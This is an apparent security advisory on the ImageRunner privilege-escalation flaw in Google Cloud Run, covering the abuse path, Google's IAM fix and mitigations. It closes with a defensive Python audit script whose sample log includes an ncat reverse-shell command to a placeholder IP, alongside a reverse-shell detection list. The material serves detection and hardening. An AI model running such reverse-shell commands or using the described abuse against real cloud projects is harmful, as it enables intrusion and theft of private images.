Mirai Botnet aka Katana – Active IOCs
April 2, 2025Lumma Stealer Malware aka LummaC – Active IOCs
April 3, 2025
Severity
High
Analysis Summary
The ImageRunner vulnerability in Google Cloud Platform (GCP), reported by a security researcher, was a privilege escalation flaw in Google Cloud Run. An attacker holding the permissions needed to update a Cloud Run service (run.services.update, plus iam.serviceAccounts.actAs on the service's runtime service account) could use it to obtain the contents of private container images stored in Google Artifact Registry and Google Container Registry, even without any registry permissions of their own. The flaw stemmed from how Cloud Run handled permissions during a deployment: the Cloud Run service agent, which holds read access to the project's registries, pulled the image on the caller's behalf, so the caller's own access to that image was never checked. This let an attacker bypass the registry's access controls and reach sensitive cloud resources.
To exploit ImageRunner, an attacker needed control of an identity with those permissions. With it, they could update a Cloud Run service, create a new revision, and point it at any private image in the project, whether or not they were allowed to read it. By overriding the container's command or arguments, for example running ncat to open a reverse shell, the attacker could then inspect the running container and read whatever the private image held. The attack worked because the deployment "borrowed" the service agent's privileges to pull the image. The researcher used this as an illustration of what they called the "Jenga®" concept: cloud providers build services on top of one another, so a weakness in one layer is inherited by everything built on it.
Google remediated the vulnerability by tightening IAM enforcement: any principal creating or updating a Cloud Run service must now explicitly have access to the container images being deployed. In practice, principals need the Artifact Registry Reader (roles/artifactregistry.reader) role on the repository or project containing the images, and deployments by identities that lack it fail. The change was fully rolled out on January 28, 2025, with notifications sent to affected users in November 2024 so organizations could prepare for it.
To mitigate future risks, organizations using GCP should apply the principle of least privilege to IAM, ensuring that only authorized identities can perform Cloud Run deployments. Security teams should alert on Cloud Run service updates that switch a service to an image outside the repositories it normally deploys from, or that change the container command, and should add further controls around container deployments. ImageRunner is a reminder that cloud security requires continuous vigilance: privilege escalation paths can emerge from the interactions between services in a multi-service architecture, not only from flaws within a single one.
Impact
- Sensitive Information Theft
- Privilege Escalation
- Gain Access
Remediation
- Ensure IAM roles are assigned with the minimum necessary permissions to prevent unauthorized privilege escalation.
- Only allow trusted identities to hold run.services.update and iam.serviceAccounts.actAs; in particular, avoid granting actAs on service accounts that carry broad project-level roles.
- Ensure that users updating or creating Cloud Run services have the Artifact Registry Reader (roles/artifactregistry.reader) role for the relevant repositories or projects.
- Implement logging and alerting to detect unusual Cloud Run revision updates, unauthorized image pulls, or privilege escalation attempts.
- Use VPC Service Controls perimeters and organization policies to restrict access to sensitive container images and prevent unauthorized deployments.
- Periodically audit IAM policies to identify and remove excessive privileges, reducing the risk of abuse.
- Ensure all security patches and updates released by Google for Cloud Run and other GCP services are applied in a timely manner.
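The two checks a practitioner would want from the analysis above and from the remediation list (find principals who can push a Cloud Run revision but hold no read permission on images, and alert on revision updates that point at an unexpected image or override the container command) can be scripted. The block below is an added example and not code from the original advisory or from Google; the role-to-permission table is a deliberately simplified subset of the real predefined roles, and the IAM policy, allowed-repository set and Cloud Audit Logs entries are constructed for the example, using the real methodName values for Cloud Run service updates.

```python
"""Audit helpers for the ImageRunner pattern: principals that can roll out a
Cloud Run revision (run.services.update plus iam.serviceAccounts.actAs) but
hold no read permission on the images they deploy, and revision updates whose
image or command looks wrong. All sample data below is constructed."""
import json
from collections import defaultdict

# Assumption: a simplified subset of predefined-role permissions, not a full catalogue.
IMAGE_READ = "artifactregistry.repositories.downloadArtifacts"  # from roles/artifactregistry.reader
ROLE_PERMS = {
    "roles/run.admin": {"run.services.update"},
    "roles/run.developer": {"run.services.update"},
    "roles/iam.serviceAccountUser": {"iam.serviceAccounts.actAs"},
    "roles/artifactregistry.reader": {IMAGE_READ},
    "roles/editor": {"run.services.update", "iam.serviceAccounts.actAs", IMAGE_READ},
    "roles/owner": {"run.services.update", "iam.serviceAccounts.actAs", IMAGE_READ},
}
DEPLOY_PERMS = {"run.services.update", "iam.serviceAccounts.actAs"}
UPDATE_METHODS = {"google.cloud.run.v1.Services.ReplaceService",
                  "google.cloud.run.v2.Services.UpdateService"}
SHELL_INDICATORS = ("ncat", "nc ", "/dev/tcp", "bash -i", "/bin/sh")


def effective_permissions(policy):
    """Union of permissions each member gets from the policy's role bindings."""
    perms = defaultdict(set)
    for binding in policy["bindings"]:
        for member in binding["members"]:
            perms[member] |= ROLE_PERMS.get(binding["role"], set())
    return perms


def deployers_without_image_read(policy):
    """Principals able to push a revision yet unable to read images themselves:
    the identities whose deployments relied on the service agent before the fix."""
    perms = effective_permissions(policy)
    return sorted(m for m, p in perms.items() if DEPLOY_PERMS <= p and IMAGE_READ not in p)


def _member(email):
    return ("serviceAccount:" if email.endswith(".gserviceaccount.com") else "user:") + email


def suspicious_revisions(log_lines, policy, allowed_repos):
    """Flag Cloud Run service updates whose new image lies outside the allowed
    repositories, whose caller lacks image read permission, or whose container
    command/args look like a reverse shell."""
    perms = effective_permissions(policy)
    hits = []
    for line in log_lines:
        payload = json.loads(line)["protoPayload"]
        if payload.get("methodName") not in UPDATE_METHODS:
            continue
        caller = _member(payload["authenticationInfo"]["principalEmail"])
        container = payload["request"]["spec"]["template"]["spec"]["containers"][0]
        image = container["image"]
        repo = image.rsplit("/", 1)[0]  # strip "name:tag" to get the repository path
        cmdline = " ".join(container.get("command", []) + container.get("args", []))
        reasons = []
        if repo not in allowed_repos:
            reasons.append("image outside allowed repositories")
        if IMAGE_READ not in perms.get(caller, set()):
            reasons.append("caller lacks image read permission")
        if any(tok in cmdline for tok in SHELL_INDICATORS):
            reasons.append("command/args match reverse-shell indicators")
        if reasons:
            hits.append({"caller": caller, "image": image, "reasons": reasons})
    return hits


# Constructed sample policy: dev and ci can deploy, only ci can read images.
SAMPLE_POLICY = {"bindings": [
    {"role": "roles/run.developer", "members": ["user:dev@example.com", "user:ci@example.com"]},
    {"role": "roles/iam.serviceAccountUser", "members": ["user:dev@example.com", "user:ci@example.com"]},
    {"role": "roles/artifactregistry.reader", "members": ["user:ci@example.com"]},
    {"role": "roles/owner", "members": ["user:admin@example.com"]},
]}
ALLOWED_REPOS = {"us-central1-docker.pkg.dev/example-prod/app-images"}


def _entry(email, image, command=None, args=None):
    """Build a constructed audit-log line in the (simplified) Cloud Audit Logs shape."""
    container = {"image": image}
    if command:
        container["command"] = command
    if args:
        container["args"] = args
    return json.dumps({"protoPayload": {
        "methodName": "google.cloud.run.v1.Services.ReplaceService",
        "authenticationInfo": {"principalEmail": email},
        "request": {"spec": {"template": {"spec": {"containers": [container]}}}}}})


SAMPLE_LOG_LINES = [
    _entry("ci@example.com", "us-central1-docker.pkg.dev/example-prod/app-images/api:1.4"),
    _entry("dev@example.com", "us-central1-docker.pkg.dev/example-secrets/internal/backup-tool:latest",
           command=["ncat"], args=["203.0.113.10", "4444", "-e", "/bin/sh"]),
]

if __name__ == "__main__":
    print("deployers without image read:", deployers_without_image_read(SAMPLE_POLICY))
    for hit in suspicious_revisions(SAMPLE_LOG_LINES, SAMPLE_POLICY, ALLOWED_REPOS):
        print("ALERT", hit)
```

In a real project the policy comes from `gcloud projects get-iam-policy PROJECT --format=json` and the log lines from a Cloud Logging sink or `gcloud logging read`; the role table would need to cover every custom and predefined role actually bound, since the simplified one above only knows the roles named in the sample. The second sample entry trips all three rules: it pulls from a repository the service never used, the caller has no read permission on any image, and the command is a textbook reverse shell.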